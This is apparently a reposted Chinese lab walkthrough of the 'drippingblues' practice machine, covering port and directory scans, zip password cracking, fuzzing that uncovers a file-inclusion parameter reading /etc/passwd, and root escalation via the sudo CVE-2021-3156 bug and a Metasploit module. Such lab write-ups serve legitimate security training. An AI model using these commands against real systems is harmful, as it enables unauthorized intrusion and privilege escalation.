OSCP 靶场
靶场介绍
drippingblues |
easy |
信息收集、兔子洞、ftp、zip爆破、ffuf 测试、sudo—CVE-2021–3156 提权、msf 提权 |
信息收集
主机发现
nmap -sn 192.168.1.0/24
端口扫描
┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.50
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-22 20:17 EST
Nmap scan report for 192.168.1.50
Host is up (0.0029s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 0 0 471 Sep 19 2021 respectmydrip.zip [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9e:bb:af:6f:7d:a7:9d:65:a1:b1:a1:be:91:cd:04:28 (RSA)
| 256 a3:d3:c0:b4:c5:f9:c0:6c:e5:47:64:fe:91:c5:cd:c0 (ECDSA)
|_ 256 4c:84:da:5a:ff:04:b9:b5:5c:5a:be:21:b6:0e:45:73 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-robots.txt: 2 disallowed entries
|_/dripisreal.txt /etc/dripispowerful.html
MAC Address: 08:00:27:D1:A4:FA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
目录扫描
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.50 -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.50
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.50/.html (Status: 403) [Size: 277]
http://192.168.1.50/index.php (Status: 200) [Size: 138]
http://192.168.1.50/.php (Status: 403) [Size: 277]
http://192.168.1.50/robots.txt (Status: 200) [Size: 78]
http://192.168.1.50/.html (Status: 403) [Size: 277]
http://192.168.1.50/.php (Status: 403) [Size: 277]
http://192.168.1.50/server-status (Status: 403) [Size: 277]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================
目录扫描发现提示信息如下:
zip 爆破
匿名登录ftp ,发现存在zip 文件
下载后,对其进行密码爆破
zip2john respectmydrip.zip > hashzip
john hashzip --wordlist=/usr/share/wordlists/rockyou.txt
里面分别是respectmydrip.txt 和secret.zip ,其中secret.zip 还需要密码,但是爆破失败。
权限获取
一开始以为secret.zip 密码需要从如下这个页面去找,然后解压后就是ssh 的密码。
后面访问了该页面,不知道怎么收集所有的单词就查看了下别人的wp,才知道是假的。真正的利用点不再这里。
https://kerszl.github.io/hacking/walkthrough/drippingblues/
对index.php 进行模糊测试才知道,ftp 文本里面的那个提示的作用,原来是个参数
ffuf -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.50/index.php?FUZZ=/etc/passwd --fs=138
包含如下页面,找到了ssh 的密码
http://192.168.1.50/index.php?drip=/etc/dripispowerful.html
使用如上的密码,登录到了thugger 用户
权限提升
上传linpeas.sh 扫描,尝试使用cve-2021-3156 漏洞进行提权
https://medium.com/mii-cybersec/privilege-escalation-cve-2021-3156-new-sudo-vulnerability-4f9e84a9f435
sudoedit –s '123123123123'
或者
sudoedit -s /
如果响应以 sudoedit: 开头的错误,我们就可以知道该机器易受攻击,sudoedit: /: not a regular file或者segfault如果响应以 sudoedit: 开头的错误,则该机器不存在漏洞或已修补usage
这里我使用如下脚本提权失败了。应该没有编译好,要找到相同版本的系统编译才能执行成功。
https://github.com/blasty/CVE-2021-3156
直接使用msf 内置的提权模块进行提权
post/multi/recon/local_exploit_suggester
exploit/linux/local/sudo_baron_samedit
补充
同样使用pkexec 也可以直接提权到root
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】drippingblues
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论